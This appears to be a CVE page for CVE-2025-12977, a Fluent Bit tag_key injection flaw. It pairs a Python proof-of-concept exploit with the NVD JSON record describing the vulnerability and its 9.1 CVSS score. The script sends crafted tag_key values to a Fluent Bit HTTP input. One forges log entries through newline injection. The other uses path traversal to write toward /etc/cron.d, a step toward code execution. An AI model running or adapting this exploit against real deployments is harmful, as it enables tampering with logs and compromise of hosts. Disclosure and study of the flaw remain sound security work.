CVE-2025-12977

import requests # CVE-2025-12977 PoC - Fluent Bit tag_key Injection # Target: Fluent Bit in_http plugin with vulnerable tag_key parameter def exploit_fluentbit_tag_injection(target_url, payload_type='newline_injection'): """ Demonstrate tag_key injection vulnerability in Fluent Bit payload_type options: - 'newline_injection': Inject newline to forge additional log entries - 'path_traversal': Use ../ to manipulate file output paths """ if payload_type == 'newline_injection': # Inject newline character to create additional log entries malicious_tag = "test\n forged-entry: malicious_data_injected" elif payload_type == 'path_traversal': # Path traversal to write outside intended directory malicious_tag = "../../etc/cron.d/malicious" else: malicious_tag = "test" # HTTP request to in_http plugin with malicious tag_key params = { 'tag_key': malicious_tag, 'message': 'original_log_entry' } try: response = requests.get(f'{target_url}/tag_key={malicious_tag}', params=params, timeout=10) print(f"[*] Request sent to {target_url}") print(f"[*] Malicious tag_key: {repr(malicious_tag)}") print(f"[*] Response status: {response.status_code}") return response.text except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None # Example usage if __name__ == '__main__': target = 'http://localhost:2020/' exploit_fluentbit_tag_injection(target, 'newline_injection') exploit_fluentbit_tag_injection(target, 'path_traversal')

{"cve": {"id": "CVE-2025-12977", "sourceIdentifier": "[email protected]", "published": "2025-11-24T15:15:46.770", "lastModified": "2025-11-28T18:15:46.550", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fluent Bit in_http, in_splunk, and in_elasticsearch input plugins fail to sanitize tag_key inputs. An attacker with network access or the ability to write records into Splunk or Elasticsearch can supply tag_key values containing special characters such as newlines or ../ that are treated as valid tags. Because tags influence routing and some outputs derive filenames or contents from tags, this can allow newline injection, path traversal, forged record injection, or log misrouting, impacting data integrity and log routing."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:treasuredata:fluent_bit:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4D0EA105-B741-4E44-828A-9300B09A7A79"}]}]}], "references": [{"url": "https://fluentbit.io/blog/2025/10/28/security-vulnerabilities-addressed-in-fluent-bit-v4.1-and-backported-to-v4.0/", "source": "[email protected]"}, {"url": "https://www.oligo.security/blog/critical-vulnerabilities-in-fluent-bit-expose-cloud-environments-to-remote-takeover", "source": "[email protected]"}]}}